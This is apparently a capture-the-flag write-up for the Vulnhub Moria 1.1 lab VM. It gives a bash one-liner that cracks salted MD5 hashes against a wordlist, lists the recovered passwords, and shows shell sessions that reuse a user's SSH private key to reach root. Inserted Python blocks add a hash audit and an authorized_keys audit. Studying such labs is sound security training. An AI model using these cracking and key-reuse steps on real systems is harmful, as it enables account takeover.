Vulnhub.com — Moria 1.1 Solution

Leigh, published in SecurityBytes, Jun 22, 2017

I originally posted my first effort here, but conceded that I hadn’t managed to get root since I’d been caught up with a hash problem.

I’m not going to migrate the other article here; instead, I’ll pick up where I left off.

My issue, as you might recall, was that I had some hashes, had some salts, and had a means of combining them into passwords, but I couldn’t figure out how I was supposed to go right-to-left in the hash function.

I decided to go around it instead, and brute-force an effort left-to-right.

Since I can’t get from the salted hash to the password, what I did was write a bash script to go from a wordlist to a series of hashes using the salts that I’ve been provided.

This script creates a file containing word and salted-hash pairs. The resulting file will contain 9 hashes per input word (since there are 9 salts).

for salt in 6MAp84 bQkChe HnqeN4 e5ad5s g9Wxv7 HCCsxP cC5nTr h8spZR tb9AWe; do for word in $(cat /usr/share/wordlists/dirb/big.txt); do echo -n "$word" | md5sum | awk -v ss="$salt" '{printf "%s%s", $1, ss}' | md5sum | awk -v ww="$word" '{print ww " : " $1}' >> ~/Desktop/moria/scripts/out.txt ; done; done;

What this one-liner does is for each of the salts we have, read in all the words in big.txt and then output the word, and the properly salted-hash next to it. This took so. much. googling.

This means that I can grep for the hashes I have and find out which word led to them.

This worked for 5 of the 9 hashes. That at least gave me something to go off:

c2d8960157fc8540f6d5d66594e165e0 / flower
727a279d913fba677c490102b135e51e
8c3c3152a5c64ffb683d78efc3520114 / spanky
6ba94d6322f53f30aca4f34960203703 / fuckoff
c789ec9fae1cd07adfc02930a39486a1
fec21f5c7dcf8e5e54537cfda92df5fe / warrior
6a113db1fd25c5501ec3a5936d817c29 / abcdef
7db5040c351237e8332bfbba757a1019
dd272382909a4f51163c77da6356cc6f
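The same wordlist check done in memory, next to a slow, per-user-salted way of storing the same passwords. This is an added example, not code from the original write-up; the function names, sample users and sample salts are made up for illustration.

```python
import hashlib
import hmac
import os

def salted_md5(word, salt):
    """The construction the one-liner reproduces: md5(hex(md5(word)) + salt)."""
    inner = hashlib.md5(word.encode()).hexdigest()
    return hashlib.md5((inner + salt).encode()).hexdigest()

def audit(records, wordlist):
    """records maps user -> (stored_hash, salt).
    Returns {user: word} for every account whose password is in wordlist."""
    found = {}
    for word in wordlist:
        inner = hashlib.md5(word.encode()).hexdigest()  # computed once per word
        for user, (stored, salt) in records.items():
            outer = hashlib.md5((inner + salt).encode()).hexdigest()
            if user not in found and outer == stored:
                found[user] = word
    return found

def store(password, iterations=600_000):
    """Hardened storage: random per-user salt and a deliberately slow KDF."""
    salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, iterations, key

def verify(password, salt, iterations, key):
    """Constant-time comparison against the stored PBKDF2 output."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, key)

# Constructed sample records: user names and salts are made up for this example.
SAMPLE = {
    "user_a": (salted_md5("spanky", "Zx81qP"), "Zx81qP"),
    "user_b": (salted_md5("long-unlisted-passphrase-41", "mK27aa"), "mK27aa"),
}
WORDS = ["flower", "spanky", "warrior", "abcdef"]

if __name__ == "__main__":
    # Only the account with a wordlist password is recovered.
    print(audit(SAMPLE, WORDS))
```

With two MD5 calls per guess, a salt only forces one pass per account; it does not make any single guess more expensive, which is what the iteration count in `store` changes.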

Attempting to log in with the first user (which was Balin, with password flower) failed.

I didn’t get a match for Oin.

Next up, Ori with spanky.

Result:

root@kali:~/Desktop/moria/scripts# ssh Ori@172.16.61.149
Ori@172.16.61.149's password:
Last login: Sun Mar 12 22:57:09 2017
-bash-4.2$ id
uid=1002(Ori) gid=1003(notBalrog) groups=1003(notBalrog)
-bash-4.2$

Having a bit of a look around, there was a poem:

-bash-4.2$ pwd
/home/Ori
-bash-4.2$ ls -a
. .. .bash_history poem.txt .ssh
-bash-4.2$ cat poem.txt
Ho! Ho! Ho! to the bottle I go
To heal my heart and drown my woe.
Rain may fall and wind may blow,
And many miles be still to go,
But under a tall tree I will lie,
And let the clouds go sailing by.
PS: Moria will not fall!
-bash-4.2$

I can only assume that has some significance for Elves.

But I also have a key pair for Ori…

-bash-4.2$ cd .ssh/

-bash-4.2$ ls -a

. .. id_rsa id_rsa.pub known_hosts

-bash-4.2$ cat id_rsa.pub

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC745Nxui7BYpnolFgEldIin1zw3/7D/RHsDSzkrUqPjkUGGkCTRT95kkhylllhS71rnJ8RkWeVQeyFWMPXYpO+8A0h+9NqU/T64as5KUX9vW23w6VVBbxuC8AlcaibzzVuxSe7mvgFenRLkcihERLaT0EeQ/tmaSGScLzcP7NOWf/a4e8f+mIDnHdoUoPPc3O8lA0SOf9T2mK+WMBVWu5drRMNgOeN7Gxm0bcK2x719CWPuyqyiyqZTZpcS7TdH+gc36OUyfbCgqJGdR2gI1o17n+VhLuV4xwyXwAjuEQyAldK50EYLIu7MO9tCBGLd04UCzvZhK4b920w2igQcuvh Ori@Prison
-bash-4.2$

And it looks like he’s been playing on localhost:

-bash-4.2$ cat known_hosts

127.0.0.1 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCuLX/CWxsOhekXJRxQqQH/Yx0SD+XgUpmlmWN1Y8cvmCYJslOh4vE+I6fmMwCdBfi4W061RmFc+vMALlQUYNz0=
-bash-4.2$

I’d assumed from the keyfile that the user name was Ori, but when I tried to log in with the id it prompted for a password.

-bash-4.2$ ssh -i id_rsa Ori@127.0.0.1
Ori@127.0.0.1's password:
Permission denied, please try again.

So I enumerated all the usernames that I’d gathered so far from the text and the key file, but they were all prompting for passwords.

-bash-4.2$ ssh -i id_rsa Balrog@127.0.0.1
Balrog@127.0.0.1's password:
Permission denied, please try again.
Balrog@127.0.0.1's password:
-bash-4.2$ ssh -i id_rsa Oin@127.0.0.1
Oin@127.0.0.1's password:
-bash-4.2$ ssh -i id_rsa Maeglin@127.0.0.1
Maeglin@127.0.0.1's password:
-bash-4.2$ ssh -i id_rsa Fundin@127.0.0.1
Fundin@127.0.0.1's password:
-bash-4.2$ ssh -i id_rsa Nain@127.0.0.1
Nain@127.0.0.1's password:
-bash-4.2$ ssh -i id_rsa Dain@127.0.0.1
Dain@127.0.0.1's password:
-bash-4.2$ ssh -i id_rsa Thrain@127.0.0.1
Thrain@127.0.0.1's password:
-bash-4.2$ ssh -i id_rsa Telchar@127.0.0.1
Telchar@127.0.0.1's password:

Grrr.

Wait a minute, it couldn’t be that simple…could it?

-bash-4.2$ ssh -i id_rsa root@127.0.0.1
Last login: Fri Apr 28 18:01:27 2017
[root@Moria ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@Moria ~]# pwd
/root
[root@Moria ~]# ls -a
. 0 .bash_history .bash_profile .cache .cshrc flag.txt .ICEauthority .pki .tcshrc
.. anaconda-ks.cfg .bash_logout .bashrc .config Desktop hosts .local .ssh
[root@Moria ~]# cat flag.txt
“All that is gold does not glitter,
Not all those who wander are lost;
The old that is strong does not wither,
Deep roots are not reached by the frost.
From the ashes a fire shall be woken,
A light from the shadows shall spring;
Renewed shall be blade that was broken,
The crownless again shall be king.”
All That is Gold Does Not Glitter by J. R. R. Tolkien
I hope you suff.. enjoyed this VM. It wasn’t so hard, was it?
-Abatchy

Boom!
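The key-based root login above implies that Ori's public key is trusted by the root account, normally through root's authorized_keys file. An audit for that condition follows as an added example (not part of the original write-up); the function names, the temporary directory layout and the key blob are constructed for illustration.

```python
import tempfile
from pathlib import Path

KEY_TYPES = ("ssh-", "ecdsa-", "sk-")

def key_blob(line):
    """Base64 key blob of a public-key / authorized_keys line, else None."""
    fields = line.split()
    if not fields or fields[0].startswith("#"):
        return None
    # Options may precede the key type: find the type, take the next field.
    # (An option value containing " ssh-..." would confuse this simple scan.)
    for i, field in enumerate(fields[:-1]):
        if field.startswith(KEY_TYPES):
            return fields[i + 1]
    return None

def blobs(path):
    """All key blobs in a file; empty set if the file does not exist."""
    if not path.is_file():
        return set()
    return {b for b in map(key_blob, path.read_text().splitlines()) if b}

def shared_keys(homes):
    """homes maps account -> home directory (Path).
    Returns (key_owner, pub_file, account) wherever a public key kept in one
    account's ~/.ssh is accepted by a different account's authorized_keys."""
    findings = []
    for owner, home in homes.items():
        ssh_dir = home / ".ssh"
        pubs = sorted(ssh_dir.glob("*.pub")) if ssh_dir.is_dir() else []
        for pub in pubs:
            for account, other in homes.items():
                trusted = blobs(other / ".ssh" / "authorized_keys")
                if account != owner and blobs(pub) & trusted:
                    findings.append((owner, pub.name, account))
    return findings

def demo():
    """Constructed layout mirroring the box: Ori's key pair, root trusting it."""
    with tempfile.TemporaryDirectory() as tmp:
        homes = {"Ori": Path(tmp, "home/Ori"), "root": Path(tmp, "root")}
        for home in homes.values():
            (home / ".ssh").mkdir(parents=True)
        blob = "AAAAB3NzaC1yc2ECONSTRUCTEDKEY"  # constructed, not the page's key
        (homes["Ori"] / ".ssh/id_rsa.pub").write_text(f"ssh-rsa {blob} Ori@Prison\n")
        (homes["root"] / ".ssh/authorized_keys").write_text(
            f"# constructed\nno-pty ssh-rsa {blob} Ori@Prison\n")
        return shared_keys(homes)
```

On a real host, pass the actual home directories and run it with enough privilege to read every account's authorized_keys.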

And there we have it. That was a lot of fun. I assume there is something that I’ve missed which has led me to needing to brute force the salted hashes, and I guess I was lucky that the account I needed to get into ssh had a common password. If not, I suppose I would have continued bruteforcing with other files until I got there, but still — what am I missing?

Thanks to abatchy, and thanks to Vulnhub.

\m/
